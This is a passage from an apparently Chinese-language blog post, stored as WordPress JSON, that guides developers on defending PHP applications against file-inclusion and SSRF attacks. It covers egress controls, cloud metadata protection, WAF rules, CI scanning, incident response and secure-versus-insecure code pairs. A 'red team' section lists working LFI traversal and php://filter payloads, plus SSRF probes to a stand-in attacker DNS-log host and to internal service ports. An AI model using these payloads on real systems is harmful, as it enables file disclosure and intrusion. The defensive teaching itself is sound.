\u5e76\u8bbe\u7f6e\u00a0<code>CURLOPT_RESOLVE<\/code>\u3001<code>CURLOPT_CONNECTTIMEOUT<\/code>\u3001<code>CURLOPT_TIMEOUT<\/code>\u5e76\u6821\u9a8c\u8fd4\u56de\u7684 IP\u3002<\/li>\n\n\n\n<li>\u82e5\u5fc5\u987b\u5141\u8bb8\u67d0\u4e9b\u5916\u90e8\u57df\u540d\uff0c\u89e3\u6790\u5b83\u4eec\u7684 IP \u5e76\u68c0\u67e5\u975e\u79c1\u6709\u7f51\u6bb5\u540e\u518d\u8bf7\u6c42\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u793a\u4f8b\uff08curl + host resolve check\uff09\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$host = parse_url($url, PHP_URL_HOST);\n$ips = dns_get_record($host, DNS_A+DNS_AAAA);\n$ip = $ips&#x5B;0]&#x5B;&#039;ip&#039;] ?? $ips&#x5B;0]&#x5B;&#039;ipv6&#039;] ?? null;\nif (is_private_ip($ip)) throw new Exception(&#039;forbidden&#039;);\n$ch = curl_init($url);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_TIMEOUT, 5);\ncurl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);\n$response = curl_exec($ch);\n\n<\/pre><\/div>\n\n\n<p>\u6ce8\u610f DNS \u6c61\u67d3\u6216\u77ed\u671f\u6539\u53d8\u4ecd\u53ef\u80fd\u7ed5\u8fc7\u3002\u6700\u7a33\u59a5\u7684\u662f&nbsp;<strong>\u7981\u6b62\u540e\u7aef\u8bbf\u95ee\u79c1\u6709\u7f51\u6bb5<\/strong>\uff08\u7f51\u7edc\u5c42\u9762\uff0c\u800c\u4e0d\u662f\u4ec5\u9760\u5e94\u7528\u5c42\uff09\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e94\u3001\u8fd0\u7ef4\u4e0e\u7f51\u7edc\u5c42\u9762\u9632\u62a4\uff08\u66f4\u9ad8\u53ef\u4fe1\u5ea6\uff09<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">1) \u7f51\u7edc\u51fa\u53e3\u7b56\u7565\uff08\u5f3a\u70c8\u5efa\u8bae\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5728\u4e91\/\u5bbf\u4e3b\u673a\u4e0a\u914d\u7f6e egress ACL\uff08\u5b89\u5168\u7ec4\uff09\uff0c\u7981\u6b62 Web \u670d\u52a1\u5668\u53d1\u8d77\u5230\u5185\u7f51\/169.254.169.254 \u7b49\u654f\u611f\u5730\u5740\u7684\u8bf7\u6c42\uff08\u9664\u975e\u786e\u6709\u9700\u6c42\uff09\u3002<\/li>\n\n\n\n<li>\u5141\u8bb8\u5916\u51fa\u8bf7\u6c42\u53ea\u80fd\u5230\u767d\u540d\u5355 IP \u6216\u901a\u8fc7\u4ee3\u7406\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">2) \u4e91\u5143\u6570\u636e\u5b89\u5168\uff08\u4e91\u5e73\u53f0\u4e13\u7528\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AWS\uff1a\u542f\u7528 IMDSv2\uff08\u5f3a\u5236 token\uff09\uff0c\u5c3d\u91cf\u7981\u7528 IMDSv1\u3002<\/li>\n\n\n\n<li>GCP\/Azure\uff1a\u5bf9\u5143\u6570\u636e\u670d\u52a1\u91c7\u53d6\u7c7b\u4f3c\u4fdd\u62a4\u6216\u9650\u5236 access\u3002<\/li>\n\n\n\n<li>\u7f51\u7edc\u5c42\u9762\u901a\u8fc7\u4e3b\u673a\u9632\u706b\u5899\u4e3b\u52a8\u963b\u65ad\u00a0<code>169.254.169.254<\/code>\u00a0\u7684\u51fa\u7ad9\uff08iptables\u3001\u4e91\u5b89\u5168\u7ec4\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">3) \u4f7f\u7528 WAF \u4e0e\u6d41\u91cf\u8fc7\u6ee4<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u914d\u7f6e WAF \u89c4\u5219\u62e6\u622a\u5e38\u89c1 LFI\/SSRF payload\uff08<code>php:\/\/<\/code>,\u00a0<code>gopher:\/\/<\/code>,\u00a0<code>etc\/passwd<\/code>,\u00a0<code>..\/<\/code>\u00a0\u7b49\uff09\uff0c\u4f46 WAF \u4e0d\u80fd\u66ff\u4ee3\u4ee3\u7801\u4fee\u590d\u3002<\/li>\n\n\n\n<li>WAF \u53ef\u963b\u65ad\u5e38\u89c1\u626b\u63cf\/\u5927\u91cf\u8bf7\u6c42\uff0c\u964d\u4f4e\u81ea\u52a8\u5316\u653b\u51fb\u6210\u529f\u7387\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">4) \u5bb9\u5668\u4e0e\u6700\u5c0f\u6743\u9650<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u628a Web \u5e94\u7528\u8fd0\u884c\u5728\u975e root \u7684\u5bb9\u5668\/\u7528\u6237\u4e0b\u3002<\/li>\n\n\n\n<li>\u786e\u4fdd\u5bb9\u5668\u6ca1\u6709\u6302\u8f7d\u4e3b\u673a\u654f\u611f\u76ee\u5f55\uff08\/var\/run\/docker.sock\u3001\/etc\uff09\u3002<\/li>\n\n\n\n<li>\u4f7f\u7528\u7f51\u7edc\u7b56\u7565\uff08K8s NetworkPolicy\uff09\u9650\u5236 Pod \u7684\u5916\u51fa\u8bbf\u95ee\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u516d\u3001\u5b9e\u64cd\u68c0\u6d4bPayload\u4e0e\u590d\u73b0\u6280\u5de7\uff08\u7ea2\u961f\u5f0f\uff09<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">LFI \u68c0\u6d4b payloads\uff08\u5feb\u901f\uff09\uff1a<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>..\/..\/..\/..\/etc\/passwd<\/code><\/li>\n\n\n\n<li><code>..\/..\/..\/..\/proc\/self\/environ<\/code>\uff08\u67e5\u770b Request Header \u6ce8\u5165\uff09<\/li>\n\n\n\n<li><code>php:\/\/filter\/convert.base64-encode\/resource=...<\/code>\uff08\u8bfb\u53d6\u6e90\u7801\uff09<\/li>\n\n\n\n<li><code>\/var\/log\/nginx\/access.log<\/code>\u3001<code>\/var\/log\/apache2\/access.log<\/code><\/li>\n\n\n\n<li>\u5c1d\u8bd5\u4e0d\u540c\u6587\u4ef6\u6269\u5c55\u4e0e\u7f16\u7801\uff1a<code>%2e%2e%2f<\/code>\u3001<code>..%2f..%2f<\/code>\u3001<code>..%252f<\/code>\uff08double-encoding\uff09<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">SSRF \u63a2\u6d4b\u65b9\u6cd5\uff1a<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5411\u63a5\u53e3\u63d0\u4ea4\u80fd\u89e6\u53d1 DNS \u56de\u8c03\u7684 URL\uff1a<code>http:\/\/attacker-dnslog\/&lt;random><\/code>\uff0c\u770b\u662f\u5426\u751f\u6210 DNS \u67e5\u8be2\uff08\u4f7f\u7528 interactsh\/Burp Collaborator\uff09\u3002<\/li>\n\n\n\n<li>\u8bbf\u95ee\u5185\u90e8\u7aef\u53e3\u5217\u8868\u00a0<code>http:\/\/127.0.0.1:2375\/<\/code>\uff08Docker API\uff09\u3001<code>http:\/\/127.0.0.1:9200\/<\/code>\uff08Elasticsearch\uff09\u3001<code>http:\/\/127.0.0.1:6379\/<\/code>\uff08Redis HTTP gateway\uff09\uff0c\u89c2\u5bdf\u54cd\u5e94\u65f6\u95f4\/\u5185\u5bb9\u5dee\u5f02\u3002<\/li>\n\n\n\n<li>\u6d4b\u8bd5 gopher payloads \u6765\u4e0e memcached \u6216 redis \u5efa\u7acb TCP \u4ea4\u4e92\uff08\u9ad8\u7ea7\u7528\u6cd5\uff0c\u9700\u719f\u6089\u534f\u8bae\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e03\u3001\u81ea\u52a8\u5316\u68c0\u6d4b\u4e0eCI\u96c6\u6210<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u9759\u6001\u4ee3\u7801\u5206\u6790<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SonarQube\uff08\u5e26\u5b89\u5168\u89c4\u5219\uff09\u3001RIPS\u3001PhpStan + \u5b89\u5168\u63d2\u4ef6\u3001Psalm + plugin-security\u3002<\/li>\n\n\n\n<li>\u4f7f\u7528\u89c4\u5219\u626b\u63cf\u00a0<code>include\/require<\/code>\u00a0\u7684\u53c2\u6570\u6765\u6e90\uff0c\u68c0\u6d4b\u00a0<code>allow_url_include<\/code>\uff0c\u68c0\u6d4b file operations \u76f4\u63a5\u7528\u5230\u00a0<code>$_GET<\/code>\/<code>$_POST<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u52a8\u6001\u626b\u63cf\uff08CI\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u628a\u5e38\u89c1 LFI\/SSRF payload \u6ce8\u5165\u6d4b\u8bd5\u7528\u4f8b\u4f5c\u4e3a\u96c6\u6210\u6d4b\u8bd5\uff08\u9ed1\u76d2\/\u7070\u76d2\uff09\u7684\u4e00\u90e8\u5206\u3002<\/li>\n\n\n\n<li>\u4f7f\u7528 OWASP ZAP \u6216 Burp \u7684 CI \u96c6\u6210\u626b\u63cf API\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u516b\u3001\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u8865\u6551\uff08\u88ab\u5229\u7528\u540e\u7684\u5904\u7406\uff09<\/h1>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7acb\u523b\u65ad\u7f51\u6216\u9650\u5236\u51fa\u7ad9\u6d41\u91cf\uff08\u9694\u79bb\u53d7\u5f71\u54cd\u4e3b\u673a\uff09\u3002<\/li>\n\n\n\n<li>\u91c7\u96c6\u5185\u5b58\/\u78c1\u76d8\u5feb\u7167\uff08\u7528\u4e8e\u53d6\u8bc1\uff09\u5e76\u4fdd\u5168\u65e5\u5fd7\u3002<\/li>\n\n\n\n<li>\u67e5\u770b webserver\/log \u6587\u4ef6\u3001\u4e0a\u4f20\u76ee\u5f55\u3001cron jobs \u662f\u5426\u88ab\u4fee\u6539\u3002<\/li>\n\n\n\n<li>\u626b\u63cf\u4e00\u904d\u7cfb\u7edf\u662f\u5426\u6709 WebShell\uff08\u67e5\u627e\u00a0<code>&lt;?php<\/code>\u00a0\u5173\u952e\u5b57\u3001eval\u3001base64_decode \u7b49\uff09\u3002<\/li>\n\n\n\n<li>\u66f4\u6539\u6240\u6709\u66b4\u9732\u5bc6\u94a5\uff08\u82e5\u6000\u7591\u5143\u6570\u636e\u6cc4\u9732\uff09\u5e76\u91cd\u65b0\u90e8\u7f72\u3002<\/li>\n\n\n\n<li>\u5728\u4fee\u8865\u5b8c\u4ee3\u7801\u540e\u6062\u590d\u670d\u52a1\uff0c\u5e76\u505a\u5b8c\u6574\u7684\u56de\u5f52\u6d4b\u8bd5\u4e0e\u6f0f\u6d1e\u590d\u6d4b\u3002<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e5d\u3001\u5b9e\u7528\u4ee3\u7801\u7247\u6bb5\u6c47\u603b\uff08\u5b89\u5168 vs \u4e0d\u5b89\u5168\u5bf9\u7167\uff09<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">\u4e0d\u5b89\u5168\uff1a\u76f4\u63a5 include \u7528\u6237\u8f93\u5165<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ninclude $_GET&#x5B;&#039;file&#039;];\n\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u5b89\u5168\uff1a\u767d\u540d\u5355 + realpath<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$map = &#x5B;\n    &#039;home&#039; =&gt; &#039;\/var\/www\/html\/pages\/home.php&#039;,\n    &#039;about&#039; =&gt; &#039;\/var\/www\/html\/pages\/about.php&#039;,\n];\n$key = $_GET&#x5B;&#039;page&#039;] ?? &#039;home&#039;;\nif (!isset($map&#x5B;$key])) { http_response_code(404); exit; }\ninclude $map&#x5B;$key];\n\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u4e0d\u5b89\u5168\uff1a\u76f4\u63a5 file_get_contents($_GET[&#8216;url&#8217;])<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$data = file_get_contents($_GET&#x5B;&#039;url&#039;]);\n\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u5b89\u5168\uff1a\u89e3\u6790+IP\u767d\u540d\u5355+curl<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nfunction is_private_ip($ip) {\n    \/\/ \u68c0\u67e5 RFC1918\u3001127.0.0.1\u3001169.254.169.254\u3001::1 \u7b49\n    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {\n        return true;\n    }\n    return false;\n}\n\n$url = $_GET&#x5B;&#039;url&#039;];\n$parse = parse_url($url);\nif (!$parse || !in_array($parse&#x5B;&#039;scheme&#039;], &#x5B;&#039;http&#039;,&#039;https&#039;])) {\n    throw new Exception(&#039;invalid url&#039;);\n}\n$host = $parse&#x5B;&#039;host&#039;];\n$records = dns_get_record($host, DNS_A + DNS_AAAA);\n$ip = $records&#x5B;0]&#x5B;&#039;ip&#039;] ?? $records&#x5B;0]&#x5B;&#039;ipv6&#039;] ?? null;\nif (!$ip || is_private_ip($ip)) {\n    throw new Exception(&#039;forbidden host&#039;);\n}\n$ch = curl_init($url);\ncurl_setopt_array($ch, &#x5B;\n    CURLOPT_RETURNTRANSFER =&gt; true,\n    CURLOPT_TIMEOUT =&gt; 5,\n    CURLOPT_CONNECTTIMEOUT =&gt; 3,\n]);\n$out = curl_exec($ch);\n\n<\/pre><\/div>\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6ce8\u610f\uff1a\u4e0a\u9762\u5224\u65ad\u4ecd\u53ef\u88ab DNS rebinding \u6216\u77ed\u65f6\u95f4 DNS TTL \u653b\u51fb\u7ed5\u8fc7\u3002\u8981\u7a33\u59a5\u5fc5\u987b\u505a&nbsp;<strong>\u7f51\u7edc\u5c42\u9650\u5236<\/strong>\uff08\u7981\u6b62\u8bbf\u95ee\u5185\u7f51\u5730\u5740\uff09\u6216\u8d70\u5185\u90e8\u4ee3\u7406\u3002<\/p>\n<\/blockquote>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u5341\u3001\u9644\uff1a\u5b9e\u7528\u53c2\u8003\u6e05\u5355\uff08\u5feb\u901f\u6267\u884c\uff09<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5728 php.ini \u4e2d\uff1a<code>allow_url_include = Off<\/code>\uff0c<code>allow_url_fopen = Off<\/code>\uff08\u82e5\u53ef\u884c\uff09\u3002<\/li>\n\n\n\n<li>\u786e\u4fdd\u00a0<code>.user.ini<\/code>\u00a0\u6216\u865a\u62df\u4e3b\u673a\u914d\u7f6e\u4e0d\u4f1a\u8986\u76d6\u8fd9\u4e9b\u8bbe\u7f6e\u5bfc\u81f4\u8fdc\u7a0b\u5305\u542b\u53ef\u7528\u3002<\/li>\n\n\n\n<li>\u4e0a\u4f20\u76ee\u5f55\u653e\u5728 webroot \u4e4b\u5916\uff0c\u6216 webserver \u7981\u6b62 PHP \u6267\u884c\u3002<\/li>\n\n\n\n<li>\u5728\u4ee3\u7801\u4e2d\u5bf9\u6240\u6709\u6587\u4ef6\/URL\u8f93\u5165\u4f7f\u7528\u767d\u540d\u5355\u6216\u6620\u5c04\u3002<\/li>\n\n\n\n<li>\u5229\u7528\u9632\u706b\u5899\/\u5b89\u5168\u7ec4\u7981\u7528\u670d\u52a1\u5668\u5bf9\u5185\u90e8\u654f\u611f\u5730\u5740\uff08169.254.169.254\u3001127.0.0.1:2375\u30012379\/2380 etc\uff09\u7684\u51fa\u7ad9\u8fde\u63a5\u3002<\/li>\n\n\n\n<li>\u542f\u7528\u4e91\u5143\u6570\u636e\u7684\u5b89\u5168\u6a21\u5f0f\uff08\u5982 AWS IMDSv2\uff09\u3002<\/li>\n\n\n\n<li>\u5728 CI \u4e2d\u52a0\u5165 SAST\uff08Psalm\/PhpStan + \u5b89\u5168\u89c4\u5219\uff09\u4e0e DAST\uff08ZAP\uff09\u626b\u63cf\u3002<\/li>\n\n\n\n<li>\u65e5\u5fd7\u4e0e\u76d1\u63a7\uff1a\u68c0\u6d4b\u975e\u9884\u671f\u7684\u5916\u90e8\u8bf7\u6c42\u3001\u5f02\u5e38\u5927\u6d41\u91cf\u6216\u9891\u7e41 4xx\/5xx\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed3\u8bed\u4e0e\u4e0b\u4e00\u6b65\u5efa\u8bae<\/h1>\n\n\n\n<p>\u8fd9\u4efd\u6307\u5357\u5df2\u8986\u76d6\u4ece\u4ee3\u7801\u5230\u7f51\u7edc\u5c42\u3001\u4ece\u68c0\u6d4b\u5230\u4fee\u590d\u7684\u5b8c\u6574\u8def\u5f84\u3002\u4e0b\u4e00\u6b65\u6211\u53ef\u4ee5\u4e3a\u4f60\u505a\u5176\u4e2d\u4efb\u610f\u4e00\u9879\u7684\u201c\u843d\u5730\u5de5\u4f5c\u201d\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u4ee3\u7801\u5ba1\u8ba1\u811a\u672c<\/strong>\uff1a\u626b\u63cf\u9879\u76ee\u4e2d\u6240\u6709\u00a0<code>include\/require\/file_get_contents\/curl_exec<\/code>\u00a0\u7684\u5371\u9669\u7528\u6cd5\u5e76\u8f93\u51fa\u53ef\u7591\u4f4d\u7f6e\uff08\u81ea\u52a8\u5316 SAST \u5c0f\u5de5\u5177\uff09\u3002<\/li>\n\n\n\n<li><strong>\u8865\u4e01\u793a\u4f8b<\/strong>\uff1a\u628a\u4f60\u73b0\u6709\u7684\u67d0\u6bb5\u6709\u95ee\u9898\u7684\u4ee3\u7801\u8d34\u7ed9\u6211\uff0c\u6211\u5e2e\u4f60\u6539\u5199\u6210\u5b89\u5168\u7248\u672c\u5e76\u7ed9\u51fa\u6d4b\u8bd5\u7528\u4f8b\u3002<\/li>\n\n\n\n<li><strong>\u68c0\u6d4b\u811a\u672c<\/strong>\uff1a\u7ed9\u4f60\u4e00\u4e2a\u7528\u4e8e\u6d4b\u8bd5 SSRF\/LFI \u7684 Burp \u6269\u5c55\u6216 curl \u5217\u8868\uff08\u5305\u542b interactsh \u96c6\u6210\uff09\u3002<\/li>\n\n\n\n<li><strong>\u8fd0\u7ef4\u65b9\u6848<\/strong>\uff1a\u6309\u4f60\u4e91\u5382\u5546\uff08AWS \/ GCP \/ \u963f\u91cc\u4e91\uff09\u5b9a\u5236\u7f51\u7edc egress \u4e0e IMDS \u9632\u62a4\u811a\u672c\u3002<\/li>\n<\/ol>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e0b\u9762\u662f\u4e00\u4efd\u9762\u5411\u5f00\u53d1\u8005\u548c\u5b89\u5168\u5de5\u7a0b\u5e08\u7684\u6df1\u5165\u6307\u5357\uff0c\u8986\u76d6&nbsp;PHP \u4e2d\u7684\u6587\u4ef6\u5305\u542b&#8230; <a class=\"more-link\" href=\"https:\/\/www.52runoob.com\/index.php\/2025\/12\/08\/php%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e4%b9%8b%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e4%b8%8essrf%e6%94%bb%e5%87%bb%e5%85%a8%e8%a7%a3%e6%9e%90\/\">Continue Reading &rarr;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[51],"tags":[],"class_list":["post-641","post","type-post","status-publish","format-standard","hentry","category-php-"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/comments?post=641"}],"version-history":[{"count":1,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":642,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions\/642"}],"wp:attachment":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/media?parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/categories?post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/tags?post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}